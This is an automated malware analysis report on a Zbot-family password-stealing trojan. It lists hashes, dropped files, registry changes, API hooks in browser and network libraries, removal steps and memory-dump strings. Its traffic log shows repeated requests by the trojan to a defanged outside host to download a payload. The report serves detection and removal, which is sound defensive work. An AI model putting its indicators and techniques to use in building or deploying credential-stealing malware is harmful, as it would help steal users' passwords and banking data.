Susp_Dropper (Kaspersky), Gen:Variant.Barys.748 (B) (Emsisoft), Gen:Variant.Barys.748 (AdAware), Trojan-PSW.Win32.Zbot.6.FD, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR, TrojanPSWZbot.YR (Lavasoft MAS)Behaviour: Trojan-PSW, Trojan, Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: dc8d3a4717d1599906bcb167809d33c0
SHA1: 7dc40767595422d3ccd210d1668f367377b6ed3e
SHA256: 403c281118a3fc242a092d3294a55b5ee7aaf00e2035bc589c66e9fd3da1d605
SSDeep: 3072:EjtkodpMluxmOVxElsg u2PYm2fKSJO8X5CplXadEuKGrtHrjbe0mrth:EWow2m6UsgRhzJAlXhGZHwrX
Size: 178688 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2007-04-05 03:38:27
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-PSW. Trojan program intended for stealing users passwords.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:928
igkyy.exe:1416
The Trojan injects its code into the following process(es):
Explorer.EXE:1140
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:928 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Numi\igkyy.exe (178 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpda114793.bat (177 bytes)
Registry activity
The process %original file name%.exe:928 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 89 12 69 34 4B F2 77 EB B0 BC 6A 4B A7 E5 79"
[HKCU\Software\Microsoft\Roypx]
"Tuafv" = "C1 CF E7 74 CB 0B E7 B2 6A 71 A1 E1 7E F5 7F 67"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process igkyy.exe:1416 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 C6 35 5C 93 A3 16 7C EE EC 63 4F BE 56 31 3A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
Dropped PE files
| MD5 | File path |
|---|---|
| 800a6e38496ed8ef0a0ec7cc62d1acb7 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Numi\igkyy.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following user-mode hooks in WININET.dll:
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetQueryDataAvailable
HttpSendRequestExW
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle
The Trojan installs the following user-mode hooks in CRYPT32.dll:
PFXImportCertStore
The Trojan installs the following user-mode hooks in USER32.dll:
SetCursorPos
DefMDIChildProcA
DefFrameProcA
DefDlgProcA
GetClipboardData
DefMDIChildProcW
DefFrameProcW
GetUpdateRgn
RegisterClassA
GetDCEx
ReleaseCapture
SetCapture
DefWindowProcA
CallWindowProcA
GetUpdateRect
PeekMessageA
CallWindowProcW
GetMessagePos
GetCursorPos
EndPaint
BeginPaint
DefWindowProcW
RegisterClassExA
GetMessageA
DefDlgProcW
SwitchDesktop
OpenInputDesktop
RegisterClassExW
RegisterClassW
GetCapture
PeekMessageW
GetMessageW
GetWindowDC
TranslateMessage
GetDC
ReleaseDC
The Trojan installs the following user-mode hooks in WS2_32.dll:
WSASend
send
closesocket
The Trojan installs the following user-mode hooks in kernel32.dll:
GetFileAttributesExW
The Trojan installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
NtCreateThread
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:928
igkyy.exe:1416 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Application Data\Numi\igkyy.exe (178 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpda114793.bat (177 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Worst
Product Name: Gnash Bert
Product Version: 7.4
Legal Copyright: Copyright (c) Ogles Ethos 2002-2009
Legal Trademarks:
Original Filename: Lice.exe
Internal Name: Raced Pies Cinch Pore
File Version: 7.4
File Description: Flaw Lawns
Comments:
Language: English (United States)
Company Name: WorstProduct Name: Gnash BertProduct Version: 7.4Legal Copyright: Copyright (c) Ogles Ethos 2002-2009Legal Trademarks: Original Filename: Lice.exeInternal Name: Raced Pies Cinch PoreFile Version: 7.4File Description: Flaw LawnsComments: Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| UPX0 | 4096 | 32768 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| UPX1 | 36864 | 176128 | 176128 | 5.4315 | 541df89d7879922750b596f07c630e04 |
| .rsrc | 212992 | 4096 | 1024 | 2.47399 | 3b5e80d5ebc970fad52d1802fdfa25ce |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://ultimatelives.com/images/unpacked/direct/X.bin | 216.38.198.78 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /images/unpacked/direct/X.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ultimatelives.com
Cache-Control: no-cache
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 02 Jul 2015 22:28:33 GMT
Connection: close
Content-Length: 39
<h1>Bad Request (Invalid Hostname)</h1>..
GET /images/unpacked/direct/X.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ultimatelives.com
Cache-Control: no-cache
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 02 Jul 2015 22:28:23 GMT
Connection: close
Content-Length: 39
<h1>Bad Request (Invalid Hostname)</h1>..
GET /images/unpacked/direct/X.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ultimatelives.com
Cache-Control: no-cache
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 02 Jul 2015 22:28:32 GMT
Connection: close
Content-Length: 39
<h1>Bad Request (Invalid Hostname)</h1>..
GET /images/unpacked/direct/X.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ultimatelives.com
Cache-Control: no-cache
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 02 Jul 2015 22:28:23 GMT
Connection: close
Content-Length: 39
<h1>Bad Request (Invalid Hostname)</h1>..
GET /images/unpacked/direct/X.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ultimatelives.com
Cache-Control: no-cache
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 02 Jul 2015 22:28:44 GMT
Connection: close
Content-Length: 39
<h1>Bad Request (Invalid Hostname)</h1>..
GET /images/unpacked/direct/X.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ultimatelives.com
Cache-Control: no-cache
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 02 Jul 2015 22:28:5
GET /images/unpacked/direct/X.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ultimatelives.com
Cache-Control: no-cache
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 02 Jul 2015 22:28:39 GMT
Connection: close
Content-Length: 39
<h1>Bad Request (Invalid Hostname)</h1>..
GET /images/unpacked/direct/X.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ultimatelives.com
Cache-Control: no-cache
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 02 Jul 2015 22:28:38 GMT
Connection: close
Content-Length: 39
<h1>Bad Request (Invalid Hostname)</h1>..
GET /images/unpacked/direct/X.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ultimatelives.com
Cache-Control: no-cache
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 02 Jul 2015 22:28:53 GMT
Connection: close
Content-Length: 39
<h1>Bad Request (Invalid Hostname)</h1>..
GET /images/unpacked/direct/X.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ultimatelives.com
Cache-Control: no-cache
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 02 Jul 2015 22:28:44 GMT
Connection: close
Content-Length: 39
<h1>Bad Request (Invalid Hostname)</h1>..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
Explorer.EXE_1140_rwx_01E00000_00025000:
.text
.text
`.data
`.data
.reloc
.reloc
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
ole32.dll
ole32.dll
gdi32.dll
gdi32.dll
g.bi>
g.bi>
PR_OpenTCPSocket
PR_OpenTCPSocket
HTTP/1.1
HTTP/1.1
userenv.dll
userenv.dll
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
urlmon.dll
urlmon.dll
cabinet.dll
cabinet.dll
del "%s"
del "%s"
if exist "%s" goto d
if exist "%s" goto d
del /F "%s"
del /F "%s"
hXXp://VVV.google.com/webhp
hXXp://VVV.google.com/webhp
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
'=%"6,6
'=%"6,6
6-,>..70>
6-,>..70>
Wmkoipj%idedoah-sg0}
Wmkoipj%idedoah-sg0}
: $"06 ,
: $"06 ,
}zoyecg{.dzf
}zoyecg{.dzf
$93 $3#5#
$93 $3#5#
%0' ;>>,
%0' ;>>,
KM].diekbau
KM].diekbau
, >(3=2;
, >(3=2;
)4>-)>.8.
)4>-)>.8.
121
121
1;5;;64|
1;5;;64|
3=??/:; )
3=??/:; )
PSSj%S
PSSj%S
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
GetKeyboardState
GetKeyboardState
OpenWindowStationW
OpenWindowStationW
GetProcessWindowStation
GetProcessWindowStation
CreateWindowStationW
CreateWindowStationW
CloseWindowStation
CloseWindowStation
SetProcessWindowStation
SetProcessWindowStation
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
SetKeyboardState
SetKeyboardState
MapVirtualKeyW
MapVirtualKeyW
USER32.dll
USER32.dll
RegOpenKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegEnumKeyExW
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
UrlUnescapeA
UrlUnescapeA
SHDeleteKeyW
SHDeleteKeyW
PathIsURLW
PathIsURLW
SHLWAPI.dll
SHLWAPI.dll
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
Secur32.dll
Secur32.dll
SetViewportOrgEx
SetViewportOrgEx
GDI32.dll
GDI32.dll
WS2_32.dll
WS2_32.dll
PFXImportCertStore
PFXImportCertStore
CertDeleteCertificateFromStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertOpenSystemStoreW
CertCloseStore
CertCloseStore
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
PFXExportCertStoreEx
PFXExportCertStoreEx
CRYPT32.dll
CRYPT32.dll
HttpSendRequestExA
HttpSendRequestExA
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestExW
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
InternetCrackUrlA
InternetCrackUrlA
HttpOpenRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersW
HttpAddRequestHeadersW
WININET.dll
WININET.dll
OLEAUT32.dll
OLEAUT32.dll
NETAPI32.dll
NETAPI32.dll
explorer.exe
explorer.exe
rdpclip.exe
rdpclip.exe
ctfmon.exe
ctfmon.exe
wscntfy.exe
wscntfy.exe
taskeng.exe
taskeng.exe
taskhost.exe
taskhost.exe
dwm.exe
dwm.exe
ntdll.dll
ntdll.dll
nspr4.dll
nspr4.dll
*kernel32.dll
*kernel32.dll
"%s" %s
"%s" %s
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
%s_XX
%s_XX
/c "%s"
/c "%s"
%sx.%s
%sx.%s
%sx
%sx
SysShadow
SysShadow
cGlobal\XXX
cGlobal\XXX
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Application Data
{02E68633-E15C-97B5-6282-9039C9037CB6}
{02E68633-E15C-97B5-6282-9039C9037CB6}
Global\{949D3418-5377-01CE-6282-9039C9037CB6}
Global\{949D3418-5377-01CE-6282-9039C9037CB6}
%Documents and Settings%\%current user%\Application Data\Taenel\gyomp.fim
%Documents and Settings%\%current user%\Application Data\Taenel\gyomp.fim
%Documents and Settings%\%current user%\Application Data\Taenel
%Documents and Settings%\%current user%\Application Data\Taenel
gyomp.fim
gyomp.fim